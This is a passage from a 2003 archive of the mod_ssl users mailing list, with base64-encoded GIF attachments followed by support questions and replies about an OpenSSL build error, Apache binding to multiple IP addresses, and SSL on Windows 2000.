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

------=_NextPart_000_0009_01C2E339.C2FA9BC0
Content-Type: application/octet-stream;
	name="mcse.gif"
Content-Transfer-Encoding: base64
Content-ID: <775500622@05032003-178E>

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

------=_NextPart_000_0009_01C2E339.C2FA9BC0
Content-Type: application/octet-stream;
	name="mcsa.gif"
Content-Transfer-Encoding: base64
Content-ID: <775500622@05032003-1795>

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
AAA7

------=_NextPart_000_0009_01C2E339.C2FA9BC0
Content-Type: application/octet-stream;
	name="Blank Bkgrd.gif"
Content-Transfer-Encoding: base64
Content-ID: <775500622@05032003-179C>

R0lGODlhLQAtAID/AP////f39ywAAAAALQAtAEACcAxup8vtvxKQsFon6d02898pGkgiYoCm6sq2
7iqWcmzOsmeXeA7uPJd5CYdD2g9oPF58ygqz+XhCG9JpJGmlYrPXGlfr/Yo/VW45e7amp2tou/lW
xo/zX513z+Vt+1n/tiX2pxP4NUhy2FM4xtjIUQAAOw==

------=_NextPart_000_0009_01C2E339.C2FA9BC0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:47:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3F45D2AA04D; Tue, 18 Mar 2003 15:47:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id DC0EC2AA04A; Tue, 18 Mar 2003 15:47:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from shareowner.com (www.shareowner.com [66.46.24.147])
	by master.modssl.org (Postfix) with ESMTP id D49532AA015
	for ; Thu,  6 Mar 2003 22:34:46 +0100 (CET)
Received: from exchange.int.shareowner.com (gw.shareowner.com [66.46.24.163])
	by shareowner.com (8.11.6/8.11.6) with ESMTP id h26LHla02448
	for ; Thu, 6 Mar 2003 16:17:48 -0500
Received: by exchange.int.shareowner.com with Internet Mail Service (5.5.2656.59)
	id ; Thu, 6 Mar 2003 16:34:54 -0500
Message-ID: 
From: Phillip Qin 
To: "'modssl-users@modssl.org'" 
Subject: undefined symbol: X509_free
Date: Thu, 6 Mar 2003 16:34:53 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2E428.39B6A0D0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phillip Qin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2E428.39B6A0D0
Content-Type: text/plain

Having searched through the archive, I could not find a solution to the
above error. This error only occurs when I build mod_ssl as dynamic linked
module. When I have done is

 

-          download zlib-1.1.4 source and build it --shared --prefix=/usr

-          download openssl-0.9.7a source and build it

-          download httpd-2.0.44 source and build it ./configure ....
--enable-ssl=shared -with-ssl=/usr/local/ssl

 

My OS is Red Hat 7.2.

 


------_=_NextPart_001_01C2E428.39B6A0D0
Content-Type: text/html



















Having searched through the archive, I could not find a solution
to the above error. This error only occurs when I build mod_ssl as dynamic
linked module. When I have done is



 



-         
download zlib-1.1.4 source and build it --shared --prefix=/usr



-         
download openssl-0.9.7a source and build it



-         
download httpd-2.0.44 source and build it ./configure
.... --enable-ssl=shared -with-ssl=/usr/local/ssl



 



My OS is Red Hat 7.2.



 









------_=_NextPart_001_01C2E428.39B6A0D0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:47:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7128C2AA052; Tue, 18 Mar 2003 15:47:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 32ADF2AA035; Tue, 18 Mar 2003 15:47:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from redback.adroit.net (redback.adroit.net [203.89.254.243])
	by master.modssl.org (Postfix) with ESMTP id AE0102AA015
	for ; Thu,  6 Mar 2003 23:10:52 +0100 (CET)
Received: from adroit.net ([202.129.84.50])
	by redback.adroit.net (8.12.3/8.12.3/Debian-5) with ESMTP id h26MAm8u028376
	for ; Fri, 7 Mar 2003 09:10:49 +1100
Message-ID: <3E67C6DB.5080405@adroit.net>
Date: Fri, 07 Mar 2003 09:08:27 +1100
From: Terry Kerr 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.6) Gecko/20011120
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: stop apache/mod_ssl binding to all IP's.
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Terry Kerr 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, I do have one other Listen directive...the Listen my.ip:80 for http, and 
yes, it is outside all  directives, because as far as I am aware, 
they have to be.  I tried placing them inside  directives and I got a 
config error.  I have no BindAddress directives at all, and one Port directive 
at Port 80.

terry



R. DuFresne wrote:

> it sounds like perhaps yer http.conf file have perhaps more then one
> listen directive, perhaps outside the  directives.  Might
> try grepping the file for listen and see what comes up.  or, better yet,
> egrepping for bind|listen|etc...
> 
> thanks,
> 
> Ron DuFresne
> 
> On Fri, 7 Mar 2003, Terry Kerr wrote:
> 
> 
>>Mark,
>>
>>Thanks for you suggestion, but whenever I try to put
>>
>>Listen my.ip.address:443 (with the correct ip address ;-)
>>
>>My http or https server does start at all on any port.  The log error I get is
>>
>>[crit] (98)Address already in use: make_sock: could not bind to address 
>>203.89.254.243 port 443
>>
>>But I don't get a similar error for port 80, so I don't know why it also doesn't 
>>start.
>>
>>I also have Listen ip.address:80 defined, and have a NameVirtualHost ip.address 
>>defined.  I have tried many different combinations of name based and ip based 
>>virtual hosting, but https always binds to all IP's.  As soon as I put the 
>>Listen ip.address:443, I get the log error above and no servers start.
>>
>>terry
>>
>>
>>
>>
>>
>>Mark Boddington wrote:
>>
>>
>>>Hi Terry,
>>>
>>>Perhaps your directives are being overridden in a "IfDefine SSL" or
>>>"IfModule SSL" block ? Listen IP:Port does work, works for me. Do you
>>>have the following in your config ?
>>>
>>>Listen my.ip.address:443
>>>...
>>>NameVirtualHost my.ip.address:443
>>>...
>>>
>>>...
>>>
>>>
>>>Cheers,
>>>
>>>Mark
>>>
>>>
>>>On Thu, 6 Mar 2003, Terry Kerr wrote:
>>>
>>>
>>>
>>>>Hi,
>>>>
>>>>I am running apache 1.3.26 and mod_ssl 2.8.9-2.1 on a debian linux system.
>>>>
>>>>The system has two IP's, and I only wish for apache to start on ports 80 and 443
>>>>on one of those IPs.  I am using named based virtual hosting for many sites on
>>>>the system for http, and have just one virtual host setup for https on port 443.
>>>> The problem that I am having is that I cannot stop mod_ssl from binding to
>>>>port 443 on both the IP's on my system.  I have tried every possible combination
>>>>of Listen, BindAddress, and Port, and have managed to prevent http from starting
>>>>on all IP's, but https still starts on all IPs.  Is there any way to stop this?
>>>>
>>>>
>>>>
>>>ddD> Will I need to start two seperate servers, one serving http only, and
>>>one
>>>
>>>
>>>>serving https only?  If I was to do this, I may as well go back to using
>>>>apache-ssl which is the default installation on debian anyway.
>>>>
>>>>Thanks in advance
>>>>
>>>>terry
>>>>
>>>>--
>>>>Terry Kerr (terry@adroit.net)
>>>>Adroit Internet Solutions (www.adroit.net)
>>>>Phone: +61 3 9563 4461
>>>>Fax: +61 3 9563 3856
>>>>
>>>>______________________________________________________________________
>>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>>User Support Mailing List                      modssl-users@modssl.org
>>>>Automated List Manager                            majordomo@modssl.org
>>>>
>>>>
>>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>
>>
>>
>>
> 



-- 
Terry Kerr (terry@adroit.net)
Adroit Internet Solutions (www.adroit.net)
Phone: +61 3 9563 4461
Fax: +61 3 9563 3856
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:48:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 743C02AA04A; Tue, 18 Mar 2003 15:48:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 259DC2AA035; Tue, 18 Mar 2003 15:48:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from smtp2.libero.it (smtp2.libero.it [193.70.192.52])
	by master.modssl.org (Postfix) with ESMTP id A708B2AA01F
	for ; Sun,  9 Mar 2003 00:22:33 +0100 (CET)
Received: from laptop (151.30.137.232) by smtp2.libero.it (6.7.015)
        id 3E48BA3400A134DC for modssl-users@modssl.org; Sun, 9 Mar 2003 00:22:21 +0100
Message-ID: <004c01c2e5c9$70f1fed0$e8891e97@laptop>
From: "John M." 
To: 
Subject: ssl on win2000
Date: Sun, 9 Mar 2003 00:21:25 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0047_01C2E5D1.D2239CB0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John M." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0047_01C2E5D1.D2239CB0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Does SSL work on a win2000, apache(1.3.xx or 2.xx - precompiled binary) =
and php(4.3.x) system?
If yes, is there someone who can tell what to do for installing it and =
make it work?=20
I need a httpds for win2000.
Thank you.

John M.
------=_NextPart_000_0047_01C2E5D1.D2239CB0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











Does SSL work on a win2000, =
apache(1.3.xx or 2.xx -=20
precompiled binary) and php(4.3.x) system?


If yes, is there someone who can tell =
what to do=20
for installing it and make it work? 


I need a httpds for win2000.


Thank you.


 


John =
M.


------=_NextPart_000_0047_01C2E5D1.D2239CB0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:49:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7165B2AA04A; Tue, 18 Mar 2003 15:49:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 1BF6E2AA035; Tue, 18 Mar 2003 15:49:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from blv-smtpout-01.boeing.com (blv-smtpout-01.boeing.com [130.76.32.69])
	by master.modssl.org (Postfix) with ESMTP id AB9272AA015
	for ; Wed, 12 Mar 2003 17:57:40 +0100 (CET)
Received: from slb-av-02.boeing.com ([129.172.13.7])
	by blv-smtpout-01.boeing.com (8.9.2/8.8.5-M2) with ESMTP id IAA27962
	for ; Wed, 12 Mar 2003 08:57:21 -0800 (PST)
Received: from blv-hub-01.boeing.com (localhost [127.0.0.1])
	by slb-av-02.boeing.com (8.9.3/8.9.2/MBS-AV-02) with ESMTP id IAA08242
	for ; Wed, 12 Mar 2003 08:57:20 -0800 (PST)
Received: from cruciate.ca.boeing.com (cruciate.ca.boeing.com [130.42.76.133])
